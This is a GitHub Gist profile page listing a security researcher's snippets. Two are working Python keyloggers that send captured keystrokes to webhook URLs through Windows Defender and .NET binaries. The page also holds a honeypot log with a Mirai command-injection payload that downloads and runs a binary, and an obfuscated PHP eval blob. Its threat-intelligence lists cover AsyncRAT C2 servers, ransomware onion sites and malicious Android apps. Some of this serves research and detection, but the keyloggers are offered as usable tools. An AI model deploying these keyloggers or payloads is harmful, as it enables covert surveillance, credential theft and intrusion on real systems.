Skip to content

Instantly share code, notes, and snippets.

View teixeira0xfffff's full-sized avatar

teixeira0xfffff

69 followers · 14 following
View GitHub Profile
@teixeira0xfffff
teixeira0xfffff / gist:89875a45ccc46b038a0ce2f7d5a10472
Created February 19, 2024 15:17
Decrypter for DexCrypto
class DexCrypto:
KEY = "qtfreet"
hexString = "0123456789ABCDEF"
@staticmethod
def FxIjsF(p0):
i = 2
i1 = 1
i2 = 0
ointArray = [0] * 27
@teixeira0xfffff
teixeira0xfffff / AsyncRAT_Server.csv
Created December 4, 2023 11:10
AsyncRAT Server listed on Fofa search engine https://en.fofa.info/
host ip
51.89.190.17:8088 51.89.190.17
185.81.157.148:5555 185.81.157.148
51.89.190.17:8000 51.89.190.17
88.119.175.231:6666 88.119.175.231
185.16.38.41:20000 185.16.38.41
193.26.115.217:7777 193.26.115.217
173.212.250.19:5000 173.212.250.19
88.229.10.198:20000 88.229.10.198
37.19.216.81:7777 37.19.216.81
@teixeira0xfffff
teixeira0xfffff / handler.py
Created December 30, 2022 10:32
Python keylogger with weaponized Binary part of Windows Defender
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess
URL = 'https://{your sub here}.free.beeceptor.com'
uploader = "C:\\Program Files\\Windows Defender\\ConfigSecurityPolicy.exe"
content = ""
def on_press(key):
@teixeira0xfffff
teixeira0xfffff / search_engines.csv
Last active March 1, 2024 20:51
Cybersecurity search engines for researchers [source https://twitter.com/danielmakelley/status/1570910911078207488]
Name URL Description
Dehashed https://www.dehashed.com/ View leaked credentials
SecurityTrails https://securitytrails.com/ Extensive DNS data
DorkSearch—Really https://dorksearch.com/ Really fast Google dorking
ExploitDB https://www.exploit-db.com/ Archive of various exploits
ZoomEye https://www.zoomeye.org/project?id=firewall Gather information about targets
Pulsedive—Search https://pulsedive.com/ Search for threat intelligence
GrayHatWarefare https://buckets.grayhatwarfare.com/ Search public S3 buckets
PolySwarm https://polyswarm.io/ Scan files and URLs for threats
Fofa https://github.com/wgpsec/fofa_viewer Search for various threat intelligence
@teixeira0xfffff
teixeira0xfffff / ransomwarefeed.csv
Last active November 10, 2023 17:39
Ransomware Feeds
Ransomware Name URL Status
AVADDON http://avaddongun7rngel.onion/ Online
SODINOKIBI (REVIL) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/ Online
NEFILIM http://hxt254aygrsziejn.onion/ Online
VFOKX (1) http://vfokxcdzjbpehgit223vzdzwte47l3zcqtafj34qrr26htjo4uf3obid.onion/ Online
VFOKX (2) http://746pbrxl7acvrlhzshosye3b3udk4plurpxt2pp27pojfhkkaooqiiqd.onion/ Online
MARKETO (deep) https://marketo.cloud/ Online
MARKETO (dark) http://g5sbltooh2okkcb2.onion/ Online
LORENZ http://lorenzmlwpzgxq736jzseuterytjueszsvznuibanxomlpkyxk6ksoyd.onion/ Online
CONTI/RYUK http://continewsnv5otx5kaoje7krkto2qbu3gtqef22mnr7eaxw3y6ncz3ad.onion/ Online
@teixeira0xfffff
teixeira0xfffff / PE_basic_structure.xml
Created April 5, 2021 14:00
<?xml version="1.0" encoding="UTF-8"?>
<mxfile host="app.diagrams.net" modified="2021-04-05T13:58:33.257Z" agent="5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36" etag="rTaCenesXKr0aODboHCg" version="14.5.7" type="google"><diagram id="AzKVqMgGisu1h7Vn0f4Q" name="Page-1">7V1rc+I6Ev01VO1uVSi/MR95JaEqCSkgcyf7JWWwAO81mDVmhsyvv/JDfqltDFgmATK3cmPJNrhP9+lWtyzVxM5y92Br68WzpSOzJnD6riZ2a4LQlCT822349BsUPmiY24buN/FRw8j4g/xGctbW0NEmcZ5jWaZjrJONU2u1QlMn0abZtvU7edrMMpMfutbmiGoYTTWTbv3L0J2F36oKjaj9ERnzBflkXmn6PUuNnMz5DZuFplu/Y3cVezWxY1uW4/+13HWQ6YqOiMW/7j6jN/xiNlo5RS64v9Ong6nURMPBx+5NQOOH9Y+74C6/NHMbPHBNULTluia2V5ON+z9uJ0ut7r9w8/+37ldtP/83+vvfwaM5n0ReDtq5Hb8XhoNGa23qNv/GioHbFs7SxEc8/nNmmGbHMi3bu0jUBI4TZNy+cWzrbxTrUe45/ONeYa2cWPvM+8HtmmnMV7htiqWAcGebFgt5RmTjL5eWP1ZbZC2RY3/iU0hvI4CMqKzqH/6OFKAZnLGIYU+A1gKVm4c3jlDBfwTAHACSAIFkOoFUEvInwLgddxvPmFr4BF5e76JO/Nfc8aW9nbrXf/SfWw+9j+5g9PHYa3V7Q3J//HX9j/AvKAdtfqLxSIDQ5jil17o/BO25rekGSpwscV3h/j7W1zVszAyG5V64smwXQhZaQlQipiWiKNFqI
@teixeira0xfffff
teixeira0xfffff / DataSvcUtil.py
Created December 2, 2020 01:54
Data exfil with DataSvcUtil.exe
# From: https://github.com/moses-palmer/pynput
from pynput.keyboard import Key, Listener
import os
import sys
import subprocess
URL = 'https://webhook.site/xxxxxx-xxxxx-xxxx-xxxxx-xxxxxxx'
uploader = "C:\Windows\Microsoft.NET\Framework64\v3.5\DataSvcUtil.exe"
content = ""
def on_press(key):
global content
@teixeira0xfffff
teixeira0xfffff / mirai.tsv
Last active November 20, 2020 12:02
Tpot experiment on Digital Ocean [https://github.com/telekom-security/tpotce]
We can make this file beautiful and searchable if this error is corrected: No tabs found in this TSV file in line 0.
"@timestamp","alert.signature","http.http_request_body_printable","src_ip","src_port","geoip.country_name","payload_printable","http.url","geoip.as_org","geoip.city_name","geoip.asn"
"Nov 8, 2020 @ 23:17:59.126","ET SCAN ELF/Mirai Variant User-Agent (Inbound)","action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;`
","94.200.76.222",49573,"United Arab Emirates","POST /cgi HTTP/1.1
User-Agent: XTC
Host: 127.0.0.1:8089
Content-Length: 172
Accept-Encoding: application/json
action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;`
@teixeira0xfffff
teixeira0xfffff / ReportedApps.csv
Last active July 8, 2020 03:04
Android Malwares [Google Play] | reported by @ReBensk @sh1shk0va @malwrhunterteam
We can make this file beautiful and searchable if this error is corrected: It looks like row 6 should actually have 6 columns, instead of 3. in line 5.
App Info,Developer Name,Pacakge Name,Google Play,Developer Email, Hash
Message Moment,Mandy L Smith,com.ppp.kkk,https://play.google.com/store/apps/details?id=com.ppp.kkk,tchick4u@gmail.com,487f13296e086e606496d26a2547dcfe3f88812e723fa21e94c52b395a0dd361
Gold Miner Game,Margie C Smith,sg.com.goldminerplusgame,https://play.google.com/store/apps/details?id=sg.com.goldminerplusgame,manuqsngdj@gmail.com,97ed67a5d9b1ffe2f3a5093e7461acb8bdad94f22b6ae1f18d24bf8960aa0363
Measure Wallpaper,Donal J Smith,kw.com.measurewallpapers.glitter,https://play.google.com/store/apps/details?id=kw.com.measurewallpapers.glitter,ritvplnci9@gmail.com,2bb4cf4853d7616b22520756c89c864b43753692c2187d72ce9266445a14c50b
Sophisticated Scanner - No trouble & profession,Cedon M Smith,com.ss.pdf.creat.soph.scanner,https://play.google.com/store/apps/details?id=com.ss.pdf.creat.soph.scanner,invesumb970@gmail.com,59e624b1167df9951e6efe7f22e7046bef5f09f6af748a020d4f97b04eefd61d
Profession Translator -Find the charm of languages,David G Smith,com.tra
@teixeira0xfffff
teixeira0xfffff / evilTwin.php
Created June 15, 2020 23:43
Auto Visitor [encoded version]
<?php
// Auto Visitor
// https://github.com/eviltwin-dev/auto-visitor
eval(str_rot13(gzinflate(str_rot13(base64_decode('jUrHDsW6ZN0HyD/YUxYOtENiMLxDu+q9XXYTqPfe9fW5z2QWTCQIgQOQwzYz5BwOTvBCYT3ff+rT+s9//td/+TdqXJ7+Qn//019nSD8mWOrZH5jEhSeUf28o+E574lhCFlga+PN/9NU6msHTyzSTd/a6ygyhGGD/iyybXr3UR+H5/7S11x1nRINHUWs0hL71z0Ivn4HmJHyW8586OssxJfFCt/v/BhT8/S9/+0zqjVb5h6F//zvfufOF0RHb0NQA0mtv2ImyfG8j4UAa/k3LVKlIugs8trVecaft2hRGX3ZhsoL6ELmegzvAiufMaxzrE1OnU16abXQpAA3CZfG4Ho3AibtjmgeQRofTCyRgSCGjagWjHAR3k1br2EAhzapNZ6Rru/NxNnN8WgenTH/OIQcej52lU+eYAnJAr/JUEK7pRHbGI6wbyKcm+nyU46nraIKFvtjNtKSam8OIjyWFsKKSE5d48zQ00cLDmCnuvsKBBgGZaLD2Pid9gqmk6o299SB3tnX8xtQDftUE0t5dpIWejmPowHIYExBOTJmAT5x2yM1Y3I59gFrf9n5hO7DRsiBMgrEF8tsn1Yjw7LeLz7nQfHI1CkJlCVKAsWVnaCbSDQ0g7J6xuQUsDPuW1EHgvhW284gs+RTPK1bwAYn6aFR95UCffDhbj/htX1nGU+JAzaMdsJlvQo77bMT0AQ8ymw9Cercf5cWyN5t3pfeH5X7uZ0qvkzjBaxKhrVV+BYYgoCRu6IZH89NhfowRqA2Tcl/rxQNLGpDEwQQu5F15PNbWt35GXmKwL+ZJriEjCYiKnddJUYbczM+x2A6+bOdGxR2OzQTjfNi6Z9Cl6kMn1X3Msxfc4qkOr+4E1bsN7EIDwFzKnNBlgVeO4n1nVi+SpSDfxtxw